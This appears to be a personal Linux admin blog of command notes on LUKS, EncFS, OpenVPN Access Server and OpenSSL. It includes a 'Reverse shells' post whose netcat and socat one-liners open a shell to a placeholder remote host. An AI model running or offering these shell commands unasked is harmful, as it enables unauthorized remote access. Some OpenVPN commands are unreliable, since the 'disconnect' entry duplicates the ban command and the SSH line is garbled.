Author: silver  Category: encryption linux  Comments: Off

Linux disk encryption using Device Mapper, the cryptsetup frontend and the Linux Unified Key Setup (LUKS) on-disk format.

Setup:

cryptsetup -y -v luksFormat /dev/sdb1
cryptsetup luksOpen /dev/sdb1 foo
cryptsetup status foo -v

Test:

cryptsetup --test-passphrase open /dev/sdb1 # (non-LUKS)
cryptsetup luksOpen --test-passphrase /dev/sdb1
cryptsetup isLuks /dev/sdb1 && echo IMaLUKS
cryptsetup luksDump /dev/sdb1

Change:

(asks for the current passphrase first)

cryptsetup -y luksChangeKey <target device> -S <target key slot number>
cryptsetup -y luksChangeKey /dev/sdb1 -S 1

Or use gui gnome-disks:

  • Disks (gnome-disks)
  • 1.0TB Hard Disk
  • Volumes: “Partition 1 1.0 TB LUKS”
  • Cogs/wheels

Add/remove key:

sudo cryptsetup -y luksAddKey ENCRYPTED_PARTITION
sudo cryptsetup luksRemoveKey ENCRYPTED_PARTITION

Various:

dmsetup ls --tree
lsblk
lsblk --fs

Reverse shells
November 26, 2016 — 12:45

Author: silver  Category: linux  Comments: Off

USING NETCAT:

SERVER/LISTEN:

netcat -lvp 9999

CLIENT:

netcat -e /bin/sh host.name 9999


NICER SHELL:

python -c 'import pty; pty.spawn("/bin/bash")'
( sleep 1; echo 'bla' ) | python -c "import pty; pty.spawn(['/usr/bin/sudo','-S','whoami']);"

USING SOCAT:

SERVER/LISTEN:

socat file:`tty`,raw,echo=0 tcp-listen:8888

CLIENT:

socat tcp-connect:host.name:8888 exec:'bash -li',pty,stderr,setsid,sigint,sane

CLIENT:

socat tcp:host.name:8888 exec:"bash -li",pty,stderr,setsid,sigint,sane
socat TCP-LISTEN:8888,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
socat FILE:`tty`,raw,echo=0 TCP:1.2.3.4:8888
export STY=
stty rows 40 cols 130
stty rows 40 cols 230

EncFS
November 25, 2016 — 22:02

Author: silver  Category: encryption linux  Comments: Off

Install on CentOS6:

Required packages:

yum install -y fuse-2.8.3-5.el6.x86_64 
yum install -y fuse-libs.x86_64
yum install -y fuse-devel.x86_64
usermod -a -G fuse <your_user>
yum install -y git
yum install -y cmake
yum install -y boost-serialization.x86_64
yum install -y openssl-devel.x86_64
yum install -y rlog-devel.x86_64
yum install -y tinyxml2-devel.x86_64 
yum install -y gettext-devel.x86_64
yum install -y centos-release-scl
yum install -y devtoolset-3-gcc-c++

Compile:

scl enable devtoolset-3 bash
git clone https://github.com/vgough/encfs
cd encfs
mkdir build
cd build
cmake ..
make
make test
make install
make package
mkdir ~/test
mkdir ~/Private

Test:

encfs ~/Private ~/test
echo testing > ~/test/testfile
fusermount -u ~/test

OpenVPN AS
November 25, 2016 — 21:31

Author: silver  Category: encryption linux  Comments: Off

OpenVPN Access Server is quite easy and fast to setup and includes a web gui.

Download:

Configuration:

Clickety click in the gui, plus some hardening:

Server:

Client:

auth SHA512
cipher AES-256-CBC

Connect with SSH + SOCKS Proxy + OTP:

$ ssh -D 1 to remote host

Ban user:

Ban a user from logging into the VPN or Web server
(doesn’t affect a user who is already logged in — for this, use DisconnectUser below):

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut

Re-admit a user who was previously banned:

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value false UserPropPut

Disconnect a user:

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut

Set client cert keysize:

/usr/local/openvpn_as/scripts/sa --keysize=4096 Init

Generating init scripts:

/usr/local/openvpn_as/scripts/openvpnas_gen_init [--auto]

Google Authenticator:

Unlock a secret:

./sacli -u <USER> --lock 0 GoogleAuthLock

Lock a secret:

./sacli -u <USER> --lock 1 GoogleAuthLock

Generate a new, unlocked secret:

./sacli -u <USER> --lock 0 GoogleAuthRegen

Generate a new, locked secret:

./sacli -u <USER> --lock 1 GoogleAuthRegen

Enable Google Authenticator for all accounts:

./sacli --key vpn.server.google_auth.enable --value true ConfigPut

Enable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value true UserPropPut

Disable:

./sacli --key vpn.server.google_auth.enable --value false ConfigPut

Disable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value false UserPropPut

Revoke and reissue secret:

./sacli -u <USER> GoogleAuthRegen

Retrieve current user properties:

./confdba -us -p

Port sharing:

Advanced VPN Settings: port-share 127.0.0.1 10443
(tcp mode only)

OpenSSL
November 25, 2016 — 21:26

Author: silver  Category: encryption linux  Comments: Off

List deleted open files (after update):

lsof | grep -i libssl | grep DEL | awk '{print $1}' | sort | uniq

Generate a CA key and self-signed CA cert, then sign a server CSR with it:

openssl genrsa -out rootCA.key 2048
openssl genrsa -des3 -out rootCA.key 2048
openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 3650 -out rootCA.pem
openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 3650 -sha256

View CSR

openssl req -in file.csr -noout -text

View cert fingerprint

openssl x509 -fingerprint -noout -in file.crt -sha256
openssl x509 -fingerprint -noout -in file.crt -sha1
openssl x509 -fingerprint -noout -in file.crt -md5

View ciphers:

openssl ciphers -v 'TLSv1' | sort

Test ciphers:

openssl s_client -connect google.com:443 -cipher "EDH"
openssl s_client -connect google.com:443 -cipher "RC4"
openssl s_client -connect google.com:443 -tls1
openssl s_client -connect google.com:443 -tls1_1
openssl s_client -connect google.com:443 -tls1_2
echo -n | openssl s_client -connect google.com:443
nmap --script ssl-enum-ciphers -p 443

Get fingerprint from live SSL cert (IRC):

echo | openssl s_client -connect efnet.port80.se:6697 |& openssl x509 -fingerprint -noout -sha256
echo | gnutls-cli -p 6697 irc.underworld.no --print-cert | sed -n '/-----BEGIN CERT/,/-----END CERT/p' |& openssl x509 -fingerprint -noout -sha256

Show fingerprint:

openssl x509 -in cert.pem -fingerprint -noout

To change the password of your private key:

openssl rsa -des3 -in ca.key -out ca_new.key
mv ca_new.key ca.key

Verifying that a Private Key Matches a Certificate

$ openssl x509 -noout -modulus -in server.pem | openssl md5 ;\
openssl rsa -noout -modulus -in server.key | openssl md5

Get the MD5 fingerprint of a certificate using OpenSSL

openssl dgst -md5 certificate.der

Get the MD5 fingerprint of a CSR using OpenSSL

openssl dgst -md5 csr.der

Debug SMTP/STARTTLS:

openssl s_client -debug -starttls smtp -crlf -connect localhost:25